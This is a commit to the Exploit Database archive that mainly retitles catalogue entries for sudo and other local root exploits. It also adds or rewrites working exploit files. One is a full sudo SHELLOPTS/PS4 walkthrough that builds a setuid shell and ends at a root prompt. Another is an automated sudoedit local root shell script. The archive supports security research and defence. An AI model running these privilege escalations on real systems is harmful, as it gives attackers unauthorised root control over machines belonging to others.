DB: 2016-03-13

Offensive Security · Offensive Security · commit fe689417a1f8 · 2016-03-13T05:03:14.000Z
1 new exploits
diff --git a/files.csv b/files.csv
@@ -298,7 +298,7 @@ id,file,description,date,author,platform,type,port
 315,platforms/windows/remote/315.txt,"Microsoft Outlook Express Javascript Execution Vulnerability",2004-07-13,N/A,windows,remote,0
 316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0
 317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0
-319,platforms/linux/local/319.c,"sudo.bin NLSPATH Local Root Exploit",1996-02-13,_Phantom_,linux,local,0
+319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Local Root Exploit",1996-02-13,_Phantom_,linux,local,0
 320,platforms/linux/local/320.pl,"suid_perl 5.001 Vulnerability",1996-06-01,"Jon Lewis",linux,local,0
 321,platforms/multiple/local/321.c,"BSD & Linux - umount Local Root Exploit",1996-08-13,bloodmask,multiple,local,0
 322,platforms/linux/local/322.c,"Xt Library Local Root Command Execution Exploit",1996-08-24,"b0z0 bra1n",linux,local,0
@@ -895,7 +895,7 @@ id,file,description,date,author,platform,type,port
 1084,platforms/php/webapps/1084.pl,"xmlrpc.php Library <= 1.3.0 - Remote Command Execute Exploit (3)",2005-07-04,"Mike Rifone",php,webapps,0
 1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 Licence Info Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0
 1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure Exploit",2005-07-04,Kozan,windows,local,0
-1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 - 1.6.8p Pathname Validation Local Root Exploit (openbsd)",2005-07-04,RusH,bsd,local,0
+1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 - 1.6.8p - Pathname Validation Local Root Exploit (OpenBSD)",2005-07-04,RusH,bsd,local,0
 1088,platforms/php/webapps/1088.pl,"Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit",2005-07-05,dab,php,webapps,0
 1089,platforms/windows/remote/1089.c,"Mozilla FireFox <= 1.0.1 - Remote GIF Heap Overflow Exploit",2005-07-05,darkeagle,windows,remote,0
 1090,platforms/windows/dos/1090.cpp,"TCP Chat (TCPX) 1.0 - Denial of Service Exploit",2005-07-06,basher13,windows,dos,0
@@ -1089,7 +1089,7 @@ id,file,description,date,author,platform,type,port
 1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 SQL Injection / Command Execution Exploit",2005-11-07,rgod,php,webapps,0
 1299,platforms/linux/local/1299.sh,"SuSE Linux <= 9.3 / 10 - (chfn) Local Root Privilege Escalation Exploit",2005-11-08,Hunger,linux,local,0
 1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Local Root Exploit",2005-11-09,"Charles Stevenson",linux,local,0
-1310,platforms/linux/local/1310.txt,"Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit",2005-11-09,"Breno Silva Pinto",linux,local,0
+1310,platforms/linux/local/1310.txt,"Sudo <= 1.6.8p9 - (SHELLOPTS/PS4 ENV variables) Local Root Exploit",2005-11-09,"Breno Silva Pinto",linux,local,0
 1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure Exploit",2005-11-09,kingcope,bsd,local,0
 1312,platforms/php/webapps/1312.php,"Moodle <= 1.6dev SQL Injection / Command Execution Exploit",2005-11-10,rgod,php,webapps,0
 1313,platforms/windows/remote/1313.c,"Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0
@@ -10658,7 +10658,7 @@ id,file,description,date,author,platform,type,port
 11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0
 11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php - (id) SQL Injection Vulnerability",2010-03-07,"Easy Laster",php,webapps,0
 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
-11651,platforms/multiple/local/11651.txt,"Tod Miller Sudo 1.6.x < 1.6.9p21 & 1.7.x < 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0
+11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.x < 1.6.9p21 & 1.7.x < 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0
 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0
 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus _V4.rgo_ (id) news.php - SQL Injection Vulnerability",2010-03-08,"Easy Laster",php,webapps,0
 11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0
@@ -13633,7 +13633,7 @@ id,file,description,date,author,platform,type,port
 15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0
 15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0
 15699,platforms/php/webapps/15699.txt,"PhpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80
-15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
+15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation (Full Nelson)",2010-12-07,"Dan Rosenberg",linux,local,0
 33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
 15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0
 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0
@@ -18203,7 +18203,7 @@ id,file,description,date,author,platform,type,port
 20898,platforms/linux/local/20898.sh,"RedHat 6.1/6.2/7.0/7.1 - Man Cache File Creation Vulnerability",2001-05-18,jenggo,linux,local,0
 20899,platforms/windows/remote/20899.txt,"Microsoft Outlook 97/98/2000/4/5 Address Book Spoofing Vulnerability",2001-06-05,3APA3A,windows,remote,0
 20900,platforms/linux/local/20900.txt,"Exim 3.x Format String Vulnerability",2001-06-06,"Megyer Laszlo",linux,local,0
-20901,platforms/linux/local/20901.c,"Sudo 1.5/1.6 Heap Corruption Vulnerability",2001-02-22,MaXX,linux,local,0
+20901,platforms/linux/local/20901.c,"Sudo 1.5/1.6 - Heap Corruption Vulnerability",2001-02-22,MaXX,linux,local,0
 20902,platforms/linux/remote/20902.c,"PKCrew TIAtunnel 0.9 alpha2 - Authentication Mechanism Buffer Overflow Vulnerability",2001-06-05,qitest1,linux,remote,0
 20903,platforms/windows/remote/20903.html,"Microsoft Internet Explorer 5.5 File Disclosure Vulnerability",2001-03-31,"Georgi Guninski",windows,remote,0
 20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0
@@ -18513,7 +18513,7 @@ id,file,description,date,author,platform,type,port
 21224,platforms/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service Vulnerability",2012-09-10,halfdog,lin_x86-64,dos,0
 21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows Long Request Buffer Overflow Vulnerability",2002-01-14,aT4r,windows,remote,0
 21226,platforms/linux/local/21226.c,"IMLib2 Home Environment Variable Buffer Overflow Vulnerability",2002-01-13,"Charles Stevenson",linux,local,0
-21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 Unclean Environment Variable Root Program Execution Vulnerability",2002-01-14,"Charles Stevenson",linux,local,0
+21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Root Program Execution Vulnerability",2002-01-14,"Charles Stevenson",linux,local,0
 21228,platforms/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service Vulnerability",2002-02-06,"Tamer Sahin",windows,dos,0
 21229,platforms/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow Vulnerability",2002-01-16,"SuSE Security",linux,local,0
 21230,platforms/php/webapps/21230.txt,"PHPNuke 4.x/5.x - Remote Arbitrary File Include Vulnerability",2002-01-16,"Handle Nopman",php,webapps,0
@@ -18698,7 +18698,7 @@ id,file,description,date,author,platform,type,port
 21416,platforms/windows/dos/21416.txt,"Microsoft Internet Explorer 5/6 - Recursive JavaScript Event Denial of Service Vulnerability",2002-04-24,"Berend-Jan Wever",windows,dos,0
 21417,platforms/hardware/webapps/21417.py,"Thomson Wireless VoIP Cable Modem Auth Bypass",2012-09-20,"Glafkos Charalambous ",hardware,webapps,0
 21418,platforms/php/webapps/21418.txt,"Manhali 1.8 - Local File Inclusion Vulnerability",2012-09-20,L0n3ly-H34rT,php,webapps,0
-21420,platforms/linux/local/21420.c,"Sudo 1.6.x Password Prompt Heap Overflow Vulnerability",2001-11-01,MaXX,linux,local,0
+21420,platforms/linux/local/21420.c,"Sudo 1.6.x - Password Prompt Heap Overflow Vulnerability",2001-11-01,MaXX,linux,local,0
 21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x Login Bypass Vulnerability",2002-04-25,"Ulf Harnhammar",php,webapps,0
 21422,platforms/linux/remote/21422.txt,"ACME Labs thttpd 2.20 - Cross-Site Scripting Vulnerability",2002-04-25,frog,linux,remote,0
 21423,platforms/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 Image Tag Script Injection Vulnerability",2002-04-25,frog,php,webapps,0
@@ -21770,7 +21770,7 @@ id,file,description,date,author,platform,type,port
 24603,platforms/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,ios,webapps,0
 24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 Down.ASP HTTP Response Splitting Vulnerability",2004-09-16,"Maestro De-Seguridad",asp,webapps,0
 24605,platforms/windows/dos/24605.txt,"Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability",2004-09-16,"Jason Summers",windows,dos,0
-24606,platforms/linux/local/24606.c,"Sudo 1.6.8 Information Disclosure Vulnerability",2004-09-18,"Rosiello Security",linux,local,0
+24606,platforms/linux/local/24606.c,"Sudo 1.6.8 - Information Disclosure Vulnerability",2004-09-18,"Rosiello Security",linux,local,0
 24607,platforms/windows/remote/24607.txt,"Google Toolbar 1.1.x About.HTML HTML Injection Vulnerability",2004-09-17,ViperSV,windows,remote,0
 24608,platforms/osx/local/24608.txt,"MacOSXLabs RsyncX 2.1 - Local Privilege Escalation Vulnerability",2004-09-17,"Matt Johnston",osx,local,0
 24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 Insecure Temporary File Creation Vulnerability",2004-09-17,"Matt Johnston",osx,local,0
@@ -23630,7 +23630,7 @@ id,file,description,date,author,platform,type,port
 26495,platforms/windows/remote/26495.py,"PCMan's FTP Server 2.0 - Remote Buffer Overflow Exploit",2013-06-30,Chako,windows,remote,0
 26496,platforms/hardware/webapps/26496.txt,"eFile Wifi Transfer Manager 1.0 - Multiple Vulnerabilities",2013-06-30,Vulnerability-Lab,hardware,webapps,8080
 26497,platforms/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer RM File Remote Stack Based Buffer Overflow Vulnerability",2005-11-10,nolimit,windows,remote,0
-26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x Environment Variable Handling Security Bypass Vulnerability",2005-11-11,"Charles Morris",linux,local,0
+26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass Vulnerability",2005-11-11,"Charles Morris",linux,local,0
 26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0
 26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 Download.PHP File Parameter SQL Injection Vulnerability",2005-11-12,A.1.M,php,webapps,0
 26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 Admin Control Panel Username SQL Injection Vulnerability",2005-11-12,bhs_team,php,webapps,0
@@ -24187,7 +24187,7 @@ id,file,description,date,author,platform,type,port
 27053,platforms/php/webapps/27053.txt,"Venom Board Post.PHP3 - Multiple SQL Injection Vulnerabilities",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
 27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass Vulnerability",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
 27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95-2004 Malformed Graphic File Code Execution Vulnerability",2006-01-09,ad@heapoverflow.com,windows,dos,0
-27056,platforms/linux/local/27056.pl,"Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (1)",2006-01-09,"Breno Silva Pinto",linux,local,0
+27056,platforms/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass Vulnerability (1)",2006-01-09,"Breno Silva Pinto",linux,local,0
 27057,platforms/linux/local/27057.py,"Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (2)",2006-01-09,"Breno Silva Pinto",linux,local,0
 27058,platforms/php/webapps/27058.txt,"PHPNuke 7.7 EV Search Module SQL Injection Vulnerability",2006-01-09,Lostmon,php,webapps,0
 27059,platforms/php/webapps/27059.txt,"Xoops Pool Module IMG Tag HTML Injection Vulnerability",2006-01-09,night_warrior771,php,webapps,0
@@ -25051,7 +25051,7 @@ id,file,description,date,author,platform,type,port
 27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,metasploit,php,remote,0
 27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0
 27943,platforms/windows/remote/27943.txt,"Oracle Java ByteComponentRaster.verify() Memory Corruption",2013-08-29,"Packet Storm",windows,remote,0
-27944,platforms/osx/local/27944.rb,"Mac OS X Sudo Password Bypass",2013-08-29,metasploit,osx,local,0
+27944,platforms/osx/local/27944.rb,"Mac OS X - Sudo Password Bypass",2013-08-29,metasploit,osx,local,0
 27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting Vulnerability",2006-06-02,The_BeKiR,asp,webapps,0
 27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0
 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0
diff --git a/platforms/bsd/local/1087.c b/platforms/bsd/local/1087.c
@@ -67,6 +67,6 @@ snprintf(path, BUFSIZ/2, "%s /tmp/%s", SUDO, argv[2]);
 system((char *)path); 
 } 
 } 
-} 
-
-// milw0rm.com [2005-07-04]
+} 
+
+// milw0rm.com [2005-07-04]
diff --git a/platforms/linux/local/1310.txt b/platforms/linux/local/1310.txt
@@ -1,52 +1,52 @@
-## Sudo local root escalation privilege ##
-## vuln versions :  sudo < 1.6.8p10
-## by breno
-
-## You need sudo access execution for some bash script ##
-## Use csh shell to change SHELLOPTS env ##
-
-ie:
-       %cat x.sh
-       #!/bin/bash -x
-
-       echo "Getting root!!"
-       %
-##
-
-##
-       # cat /etc/sudoers
-       ...
-       breno   ALL=(ALL) /home/breno/x.sh
-       ..
-       #
-
-## Let's use an egg shell :)
-       %cat egg.c
-
-#include <stdio.h>
-
-       int main()
-       {
-       setuid(0);
-       system("/bin/sh");
-}
-%
-
-% gcc -o egg egg.c
-% setenv SHELLOPTS xtrace
-% setenv PS4 '$(chown root:root egg)'
-% sudo ./x.sh
-echo Getting root!!
-Getting root!!
-% ls -lisa egg
-1198941 8 -rwxr-xr-x  1 root root 7428 2005-11-09 13:54 egg
-% setenv PS4 '$(chmod +s egg)'
-% sudo ./x.sh
-echo Getting root!!
-Getting root!!
-% ./egg
-sh-3.00# id
-uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)
-sh-3.00#
-
-# milw0rm.com [2005-11-09]
+## Sudo local root escalation privilege ##
+## vuln versions :  sudo < 1.6.8p10
+## by breno
+
+## You need sudo access execution for some bash script ##
+## Use csh shell to change SHELLOPTS env ##
+
+ie:
+       %cat x.sh
+       #!/bin/bash -x
+
+       echo "Getting root!!"
+       %
+##
+
+##
+       # cat /etc/sudoers
+       ...
+       breno   ALL=(ALL) /home/breno/x.sh
+       ..
+       #
+
+## Let's use an egg shell :)
+       %cat egg.c
+
+#include <stdio.h>
+
+       int main()
+       {
+       setuid(0);
+       system("/bin/sh");
+}
+%
+
+% gcc -o egg egg.c
+% setenv SHELLOPTS xtrace
+% setenv PS4 '$(chown root:root egg)'
+% sudo ./x.sh
+echo Getting root!!
+Getting root!!
+% ls -lisa egg
+1198941 8 -rwxr-xr-x  1 root root 7428 2005-11-09 13:54 egg
+% setenv PS4 '$(chmod +s egg)'
+% sudo ./x.sh
+echo Getting root!!
+Getting root!!
+% ./egg
+sh-3.00# id
+uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)
+sh-3.00#
+
+# milw0rm.com [2005-11-09]
diff --git a/platforms/linux/local/319.c b/platforms/linux/local/319.c
@@ -57,6 +57,6 @@ main(int argc, char **argv)
    execl(PATH_SUDO, "sudo.bin","bash", NULL);
 }
 
-
-
-// milw0rm.com [1996-02-13]
+
+
+// milw0rm.com [1996-02-13]
diff --git a/platforms/multiple/local/11651.sh b/platforms/multiple/local/11651.sh
@@ -0,0 +1,25 @@
+#!/bin/sh
+# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
+# local root exploit
+# March 2010
+# automated by kingcope
+# Full Credits to Slouching
+echo Tod Miller Sudo local root exploit
+echo by Slouching
+echo automated by kingcope
+if [ $# != 1 ]
+then
+echo "usage: ./sudoxpl.sh <file you have permission to edit>"
+exit
+fi
+cd /tmp
+cat > sudoedit << _EOF
+#!/bin/sh
+echo ALEX-ALEX
+su
+/bin/su
+/usr/bin/su
+_EOF
+chmod a+x ./sudoedit
+sudo ./sudoedit $1
+

Original file line number	Diff line number	Diff line change
`@@ -67,6 +67,6 @@ snprintf(path, BUFSIZ/2, "%s /tmp/%s", SUDO, argv[2]);`
`67`	`67`	`system((char *)path);`
`68`	`68`	`}`
`69`	`69`	`}`
`70`		`-}`
`71`		`-`
`72`		`-// milw0rm.com [2005-07-04]`
	`70`	`+}`
	`71`	`+`
	`72`	`+// milw0rm.com [2005-07-04]`
Original file line number	Diff line number	Diff line change
`@@ -57,6 +57,6 @@ main(int argc, char **argv)`
`57`	`57`	`execl(PATH_SUDO, "sudo.bin","bash", NULL);`
`58`	`58`	`}`
`59`	`59`
`60`		`-`
`61`		`-`
`62`		`-// milw0rm.com [1996-02-13]`
	`60`	`+`
	`61`	`+`
	`62`	`+// milw0rm.com [1996-02-13]`